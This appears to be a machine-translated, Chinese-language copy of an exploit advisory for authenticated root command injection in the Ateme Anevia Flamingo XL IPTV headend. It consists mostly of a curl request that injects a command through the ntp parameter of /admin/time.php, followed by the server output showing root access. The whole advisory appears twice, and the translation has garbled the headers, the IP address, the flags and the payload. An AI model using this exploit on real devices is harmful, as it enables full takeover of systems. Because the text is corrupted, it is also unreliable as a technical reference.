exploit title: Anevia Flamingo XL 3.6.20-身份验证的根远程代码执行
利用作者:液态虫
vendor: Ateme
产品网页: https://www.ateme.com
受影响的版本: 3.6.20,3.2.9
硬件修订1.1,1.0
肥皂2.4.1,2.0.3
肥皂系统1.3.1
Summary: Flamingo XL,一种新的模块化和高密度IPTV头端
酒店和公司市场的产品。火烈鸟XL捕获
卫星,有线,数字地面的直播电视和广播内容
和模拟源在通过IP网络将其流式传输到STB之前,PC
或其他IP连接的设备。火烈鸟XL基于模块
4U机架硬件平台允许酒店和公司视频
服务提供商可以从各种来源提供多种渠道
超越内部IP网络。
DESC:受影响的设备患有身份验证的远程代码
执行漏洞。远程攻击者可以利用此问题
并执行任意系统命令授予她的系统访问
具有根特权。
在: GNU/Linux 3.1.4(x86_64)测试
Apache/2.2.15(UNIX)
mod_ssl/2.2.15
OpenSSL/0.9.8G
DAV/2
PHP/5.3.6
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5779
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5779.php
13.04.2023
- -
curl -Vl http://192.168.1/admin/time.php -h'cookie: phpsessID=i3nu7de9vv0q9pi4a8eg8v71b4 b4'd'ntp=
%总%收到%XFERD平均速度时间时间当前
Dload上传总左速度
0 0 0 0 0 0 0 0-:---:----:---:---:---:---:--0*尝试192.168.1.1.1:80 .
*连接到192.168.1.1(192.168.1.1)端口80(#0)
post/admin/time.php http/1.1
HOST: 192.168.1.1
用户代理:卷发/8.0.1
ACCEPT: /
cookie: phpsessID=i3NU7DE9VV0Q9PI4A8EG8V71B4
内容长度: 32
content-type:应用程序/x-www-form-urlenceded
} [32个字节数据]
100 32 0 0 100 32 0 25 0:00:01 0:00:01-:---:--25 http/1.1 302
Date: THU,2023年4月13日23:54:15 GMT
Server: Apache/2.2.15(UNIX)MOD_SSL/2.2.15 OPENSSL/0.9.8G DAV/2 PHP/5.3.6
X-Power-By: php/5.3.6
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control: no商店,无缓存,必须重新录制,scheck=0,pre-check=0
pragma:无缓存
*请在下次发送之前倒入输出
location: /admin/time.php
转移编码:分块
content-type:文本/html
*忽略响应体
{[5个字节数据]
100 32 0 0 100 32 0 19 0:00336001 0:00:01-:---:--19
*连接#0与主机192.168.1.1左左完整
*向此url:'http://192.168.1.1/admin/time.php'发出另一个请求
*从邮政切换到
*找到HOST:0x1DE6C6321B0的捆绑包[串行]
*与主机192.168.1.1重复使用现有连接#0
post/admin/time.php http/1.1
HOST: 192.168.1.1
用户代理:卷发/8.0.1
ACCEPT: /
cookie: phpsessID=i3NU7DE9VV0Q9PI4A8EG8V71B4
http/1.1 200好
date: THU,2023年4月13日23:54:17 GMT
Server: Apache/2.2.15(UNIX)MOD_SSL/2.2.15 OPENSSL/0.9.8G DAV/2 PHP/5.3.6
X-Power-By: php/5.3.6
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control: no商店,无缓存,必须重新录制,scheck=0,pre-check=0
pragma:无缓存
转移编码:分块
content-type:文本/html
{[[13853字节数据]
14 APR 033:54:17 NTPDATE [8964] :找不到主机UID=0(root)BR/-----------------------------------------------------------------
14 APR 033:54:17 NTPDATE [8964] :找不到主机Gid=0(root)BR/-----------------------------------------------------------------------------------------------------
100 33896 0 33896 0 0 14891 0-:---:-- 0:00:02 - :--:--:--99K
*连接#0与主机192.168.1.1左左完整
利用作者:液态虫
vendor: Ateme
产品网页: https://www.ateme.com
受影响的版本: 3.6.20,3.2.9
硬件修订1.1,1.0
肥皂2.4.1,2.0.3
肥皂系统1.3.1
Summary: Flamingo XL,一种新的模块化和高密度IPTV头端
酒店和公司市场的产品。火烈鸟XL捕获
卫星,有线,数字地面的直播电视和广播内容
和模拟源在通过IP网络将其流式传输到STB之前,PC
或其他IP连接的设备。火烈鸟XL基于模块
4U机架硬件平台允许酒店和公司视频
服务提供商可以从各种来源提供多种渠道
超越内部IP网络。
DESC:受影响的设备患有身份验证的远程代码
执行漏洞。远程攻击者可以利用此问题
并执行任意系统命令授予她的系统访问
具有根特权。
在: GNU/Linux 3.1.4(x86_64)测试
Apache/2.2.15(UNIX)
mod_ssl/2.2.15
OpenSSL/0.9.8G
DAV/2
PHP/5.3.6
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5779
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5779.php
13.04.2023
- -
curl -Vl http://192.168.1/admin/time.php -h'cookie: phpsessID=i3nu7de9vv0q9pi4a8eg8v71b4 b4'd'ntp=
%总%收到%XFERD平均速度时间时间当前
Dload上传总左速度
0 0 0 0 0 0 0 0-:---:----:---:---:---:---:--0*尝试192.168.1.1.1:80 .
*连接到192.168.1.1(192.168.1.1)端口80(#0)
post/admin/time.php http/1.1
HOST: 192.168.1.1
用户代理:卷发/8.0.1
ACCEPT: /
cookie: phpsessID=i3NU7DE9VV0Q9PI4A8EG8V71B4
内容长度: 32
content-type:应用程序/x-www-form-urlenceded
} [32个字节数据]
100 32 0 0 100 32 0 25 0:00:01 0:00:01-:---:--25 http/1.1 302
Date: THU,2023年4月13日23:54:15 GMT
Server: Apache/2.2.15(UNIX)MOD_SSL/2.2.15 OPENSSL/0.9.8G DAV/2 PHP/5.3.6
X-Power-By: php/5.3.6
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control: no商店,无缓存,必须重新录制,scheck=0,pre-check=0
pragma:无缓存
*请在下次发送之前倒入输出
location: /admin/time.php
转移编码:分块
content-type:文本/html
*忽略响应体
{[5个字节数据]
100 32 0 0 100 32 0 19 0:00336001 0:00:01-:---:--19
*连接#0与主机192.168.1.1左左完整
*向此url:'http://192.168.1.1/admin/time.php'发出另一个请求
*从邮政切换到
*找到HOST:0x1DE6C6321B0的捆绑包[串行]
*与主机192.168.1.1重复使用现有连接#0
post/admin/time.php http/1.1
HOST: 192.168.1.1
用户代理:卷发/8.0.1
ACCEPT: /
cookie: phpsessID=i3NU7DE9VV0Q9PI4A8EG8V71B4
http/1.1 200好
date: THU,2023年4月13日23:54:17 GMT
Server: Apache/2.2.15(UNIX)MOD_SSL/2.2.15 OPENSSL/0.9.8G DAV/2 PHP/5.3.6
X-Power-By: php/5.3.6
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control: no商店,无缓存,必须重新录制,scheck=0,pre-check=0
pragma:无缓存
转移编码:分块
content-type:文本/html
{[[13853字节数据]
14 APR 033:54:17 NTPDATE [8964] :找不到主机UID=0(root)BR/-----------------------------------------------------------------
14 APR 033:54:17 NTPDATE [8964] :找不到主机Gid=0(root)BR/-----------------------------------------------------------------------------------------------------
100 33896 0 33896 0 0 14891 0-:---:-- 0:00:02 - :--:--:--99K
*连接#0与主机192.168.1.1左左完整